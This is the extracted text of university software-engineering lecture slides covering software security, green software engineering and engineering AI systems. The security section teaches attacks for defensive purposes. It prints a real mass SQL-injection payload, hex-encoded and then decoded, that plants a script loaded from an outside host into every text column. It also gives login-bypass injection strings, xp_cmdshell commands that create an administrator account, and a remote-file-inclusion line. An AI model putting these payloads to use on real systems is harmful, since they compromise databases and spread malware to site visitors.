SOFTWARE

ENGINEERING
CO3001

CHAPTER 12 – ADVANCED TOPICS Anh Nguyen-Duc

Tho Quan-Thanh

Adapted from https://iansommerville.com/software-engineering-book/slides/ WEEK 1

TOPICS COVERED
ü Software security
ü Green Software Engineering
ü Software Engineering for AI systems

CH1. INTRODUCTION
2
PUZZLE – WHAT IS THIS?

"GET /programs/biosafety/bioSafety_handBook/Chapter%206-
Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);S
ET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
40432076617263686172283430303029204445434C415245205461626C655F43
7572736F7220435552534F5220464F522073656C65637420612E6E616D652C62
2E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D
6E73206220776865726520612E69643D622E696420616E6420612E78747970653
D27752720616E642028622E78747970653D3939206F7220622E78747970653D3
335206F7220622E78747970653D323331206F7220622E78747970653D3136372
9204F50454E205461626C655F437572736F72204645544348204E455854204652
4F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E20657865632827
757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B
40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268
7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3
C2F7363726970743E3C212D2D2727207768!6!5726520272B40432B27206E6F74
206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22
687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4
D20205461626C655F437572736F7220494E544F2040542C404320454E4420434
C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626
C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
ANSWER
ü "GET
/programs/biosafety/bioSafety_handBook/Chapter%206-
Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%2
0CHAR(4000);SET%20@S=CAST(0xDECLARE @T varchar(255)'@C
varchar(4000) DECLARE Table_Cursor CURSOR FOR select
a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update
['+@T+'] set ['+@C+']=['+@C+']+''"></title><script
src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' wh??re '+@C+'
not like ''%"></title><script
src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT
FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

ü http://www.dolcevie.com/js/converter.html
DO YOU KNOW?

ü 75% of attacks today happen at the Application Layer

(Gartner).
ü Many “easy hacking recipes” published on web.
ü Security holes in the web application layer can make a
perfectly patched and firewalled server completely
vulnerable.

The cost and reputation savings of avoiding a security breach are

“priceless”
SECURITY PROPERTIES

ü Confidentiality
­ Information about system or its users cannot be learned by an attacker
ü Integrity
­ The system continues to operate properly, only reaching states that
would occur if there were no attacker
ü Availability
­ Actions by an attacker do not prevent users from having access to use
of the system
 GENERAL PICTURE

System

Alice Attacker

ü Security is about
­ Honest user (e.g., Alice, Bob, …)
­ Dishonest Attacker
­ How the Attacker
­ Disrupts honest user’s use of the system (Integrity, Availability)
­ Learns information intended for Alice only (Confidentiality)
 GENERAL PICTURE

System

Alice Attacker

ü Security is about
­ Honest user (e.g., Alice, Bob, …)
­ Dishonest Attacker
­ How the Attacker
­ Disrupts honest user’s use of the system (Integrity, Availability)
­ Learns information intended for Alice only (Confidentiality)
Network security

Network Attacker
System
Intercepts and
controls network
communication

Alice
Web security

System

Web Attacker

Sets up malicious
site visited by
victim; no control
of network
Alice
Operating system security

OS Attacker

Controls malicious
files and
applications

Alice
 System

Alice Attacker

Confidentiality: Attacker does not learn Alice’s secrets

Integrity: Attacker does not undetectably corrupt system’s function for Alice
Availability: Attacker does not keep system from being useful to Alice
OWASP TOP TEN LIST

http://www.owasp.org/index.php/Top_10
CROSS-SITE SCRIPTING (XSS) ATTACKS

A hacker was able to insert

JavaScript code into the Obama
community blog section
The JavaScript would redirect the users
to the Hillary Clinton website
YouTube Demonstration
Read about it on ChannelWeb

Websites from FBI.gov, CNN.com,

Time.com, Ebay, Yahoo, Apple
computer, Microsoft, Zdnet, Wired,
and Newsbytes have all had XSS
bugs
Mar 2021 CH1. INTRODUCTION
SQL INJECTION ATTACKS

“SQL injection is a security vulnerability that occurs in the

database layer of an application. Its source is the incorrect
escaping of dynamically-generated string literals embedded in
SQL statements. “ (Wikipedia)
SQL INJECTION ATTACKS
ü Login Example Attack
­ Text in blue is your SQL code, Text in orange is the hacker input,
black text is your application code
­ Login: Password:

ü Dynamically Build SQL String performing authentication:

­ “SELECT * FROM users WHERE login = ‘” + userName + “’ and
password= ‘” + password + “’”;

ü Hacker logs in as: ‘ or ‘’ = ‘’; --

­ SELECT * FROM users WHERE login = ‘’ or ‘’ = ‘’; --‘ and
password=‘’
MORE DANGEROUS SQL INJECTION ATTACKS

ü Hacker creates a Windows Account:

­ SELECT * FROM users WHERE login = ‘’; exec
master..xp_cmdshell 'net users username password /add';--’
and password= ’’
ü And then adds himself as an adminstrator:
­ SELECT * FROM users WHERE login = ‘'; exec
master..xp_cmdshell 'net localgroup Administrators username
/add';--’ and password= ‘’
ü SQL Injection examples are outlined in:
­ http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
­ http://www.unixwiz.net/techtips/sql-injection.html
INSECURE DIRECT OBJECT REFERENCE
ü “A direct object reference occurs when a developer exposes a
reference to an internal implementation object, such as a file,
directory, database record, or key, as a URL or form
parameter. Attackers can manipulate those references to access
other objects without authorization.”

ü Fancy term for parameter tampering

ü Involves modifying parameters to access unauthorized materials

ü E.g. /BankAccount.jsp?acct_nmbr=123
­ The hacker modifies the parameter to view another users account
 MALICIOUS FILE EXECUTION
ü “Code vulnerable to remote file inclusion (RFI) allows attackers to
include hostile code and data, resulting in devastating attacks, such
as total server compromise. Malicious file execution attacks affect
PHP, XML and any framework which accepts filenames or files from
users.”
ü Happens when code is executed on the server from a non-
trusted source
­ All web applications are vulnerable to malicious file execution if they accept
filenames or files from the user.

ü Classic example: PHP is particularly vulnerable

­ Hacker visits a website that allows uploads
­ Hacker uploads a malicious code
­ Hacker learns directory structure and sends the path as a parameter
­ PHP code is executed on the server
­ include $_REQUEST[‘filename’];
 ü https://cve.mitre.org
ü https://cwe.mitre.org

The Common Weakness Enumeration (CWE)

is a category system for software weaknesses
and vulnerabilities. It is sustained by a
community project with the goals of
understanding flaws in software and creating
automated tools that can be used to identify,
fix, and prevent those flaws.

Mar 2021 CH1. INTRODUCTION

VULNERABILITY ASSESSMENT

• Assess and secure all parts individually

• The idea is to force an attacker to penetrate several
defence layers
• As a general rule, data stored in databases are considered
as "untrusted"

"In God we trust,

for the rest, we test"
TWO OPTIONS

ü Static analysis
­ Automated methods to find errors or check their absence
­ Consider all possible inputs (in summary form)
­ Find bugs and vulnerabilities
­ Can prove absence of bugs, in some cases

ü Dynamic analysis
­ Run instrumented code to find problems
­ Need to choose sample test input
­ Can find vulnerabilities but cannot prove their absence
STATIC ANALYSIS

ü Long research history

ü Decades of commercial products
­ FindBugs, Fortify, Coverity, MS tools, …
ON THE EFFECTIVENESS OF STATIC TESTING

Nguyen-Duc, A., Do, M. V., Luong Hong, Q., Nguyen Khac, K., & Nguyen Quang, A. (2021). On the adoption
of static analysis for software security assessment–A case study of an open-source e-government project.
Computers & Security, 111, 102470. https://doi.org/10.1016/j.cose.2021.102470 CH1. INTRODUCTION
DYNAMIC ANALYSIS

ü Instrument code for testing

­ Heap memory: Purify
­ Perl tainting (information flow)
­ Java race condition checking
ü Black-box testing
­ Fuzzing and penetration testing
­ Black-box web application security analysis

25
PENETRATION TESTING

ü A penetration test is a method of evaluating the security of a

computer system or network by simulating an attack from a
malicious source, known as a Black Hat Hacker, or Cracker. –
Wikipedia

Mar 2021 CH1. INTRODUCTION

PENETRATION TESTING VS. VULNERABILITY ASSESSMENT

ü Vulnerability Assessment:
­ Predictable. Can be planned & designed
­ Unreliable at times and high rate of false positives. (I’ve got a banner)
­ Produces a report with mitigation guidelines and action items.
ü Penetration Testing:
­ Unpredictable by the recipient. (Don’t know the “how?” and “when?”)
­ Highly accurate and reliable. (I’ve got root!)
­ Penetration Testing = Proof of Concept against vulnerabilities.
­ Produces a binary result: Either the team owned you, or they didn't.

Mar 2021 CH1. INTRODUCTION

PENTEST - STEPS

ü Analysis and Information Gathering

ü Network Enumeration and Scanning
ü Vulnerability Testing and Exploitation
ü Reporting

Mar 2021 CH1. INTRODUCTION

PENTEST - STEPS

ü Analysis and Information Gathering

­ To discover as much information about a target (individual or
organization) as possible without actually making network contact with
said target.
­ Methods:
­ Organization info discovery via WHOIS
­ Google search
­ Website browsing

Mar 2021 CH1. INTRODUCTION

PENTEST - STEPS

ü Analysis and Information Gathering

ü Network Enumeration and Scanning
­ To discover existing networks owned by a target as well as live hosts
and services running on those hosts.
­ Methods
­ Scanning programs that identify live hosts, open ports, services, and other info
(Nmap, autoscan)
­ DNS Querying
­ Route analysis (traceroute)

Mar 2021 CH1. INTRODUCTION

PENTEST - STEPS

ü Analysis and Information Gathering

ü Network Enumeration and Scanning
ü Vulnerability Testing and Exploitation
­ To check hosts for known vulnerabilities and to see if they are
exploitable, as well as to assess the potential severity of said
vulnerabilities.
­ Methods:
­ Remote vulnerability scanning (Nessus, OpenVAS)
­ Active exploitation testing
­ Login checking and bruteforcing
­ Vulnerability exploitation (Metasploit, Core Impact)
­ 0day and exploit discovery (Fuzzing, program analysis)
­ Post exploitation techniques to assess severity (permission levels, backdoors, rootkits, etc)
Mar 2021 CH1. INTRODUCTION
 GREEN SOFTWARE ENGINEERING

Aug 2019 CH1. INTRODUCTION

32
SOFTWARE ENGINEERING AND SUSTAINABILITY

Aug 2019 CH1. INTRODUCTION

33
34

GREENING IT VS GREENING BY IT

Silvana Trimi & Sang-Hyun Park, 2013. "Green IT: practices of leading firms and NGOs," Service Business,
Springer;Pan-Pacific Business Association, vol. 7(3), pages 363-379, September.
SOFTWARE ENGINEERING AND SUSTAINABILITY - EXAMPLE

ü Green Software Engineering is an emerging

discipline at the intersection of climate science,
software practices and architecture, electricity
markets, hardware and data centre design.
ü Green Software Engineering concerns the design,
development and operation of software-intensive
products in a way that reduces pollution, promotes
sustainability, and minimizes risk to human health and
the environment without sacrificing economic viability
and efficiency
https://principles.green/
Aug 2019 CH1. INTRODUCTION
35
SOFTWARE ENGINEERING AND SUSTAINABILITY - TOPICS

ü Sustainability Theory
ü Requirements Engineering for Sustainability
ü Sustainability Analysis
ü Sustainability issues in Software Architecture and Design
ü Sustainable System Modelling
ü Sustainability Engineering Process
ü Sustainability in Testing and Quality Assurance
ü Sustainability Management Process
Torre, D., Procaccianti, G., Fucci, D., Lutovac, S. and Scanniello, G. 2017. On the presence of green and sustainable software engineering
in higher education curricula. Proceedings of the 1st International Workshop on Software Engineering Curricula for Millennials (Buenos
Aires, Argentina, May 2017), 54–60.
 SOFTWARE ENGINEERING FOR AI

Aug 2019 CH1. INTRODUCTION

37
38
 39
https://blog.re-work.co/how-does-netflix-know-what-movies-youll-enjoy/
AI systems - frontend

40
https://medium.com/dvt-engineering/narc-a-fault-detecting-solution-1e68bf239d71
Classification of AI

q Weak AI vs. Strong AI

q Super AI
q Friendly AI

41
WHAT DOES THAT MEAN TO ENGINEER AN AI SYSTEMS

Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., Chaudhary, V., Young, M., Crespo, J.-F. and Dennison, D. 2015.
Hidden Technical Debt in Machine Learning Systems. Proceedings of the 28th International Conference on Neural Information
Processing Systems - Volume 2 (Cambridge, MA, USA, 2015), 2503–2511.
Mar 2021 CH1. INTRODUCTION
44

https://docs.microsoft.com/en-us/azure/machine-
learning/team-data-science-process/overview
45

ENGINEERING PERSPECTIVE

P. Santhanam et al. Engineering Reliable Deep Learning Systems.

https://arxiv.org/abs/1910.12582
https://hbr.org/2018/01/artificial-intelligence-for-the-real-world 46
47

7 GLOBAL SME CASE STUDIES

o unclear business scenarios

o failure to align business expectation with project reality
o communication breakdown between AI experts and customers
o lack of metrics to evaluate AI project
o Integration with various business processes
o Supporting organizational transformation
o Addressing trustworthiness and ethic concerns

Nguyen-Duc, A., Sundbø, I., Nascimento, E., Conte, T., Ahmed, I. and Abrahamsson, P. 2020. A Multiple Case Study of Artificial
Intelligent System Development in Industry. Proceedings of the Evaluation and Assessment in Software Engineering (Trondheim,
Norway, Apr. 2020), 1–10.
48

CASE STUDIES ON AI COMPANIES

PROBLEMS

o unclear business scenarios

o failure to align business expectation with project reality
o communication breakdown between AI experts and customers
o lack of metrics to evaluate AI project
o Integration with various business processes
o Supporting organizational transformation
o Addressing trustworthiness and ethic concerns
Q&A

Mar 2021 CH1. INTRODUCTION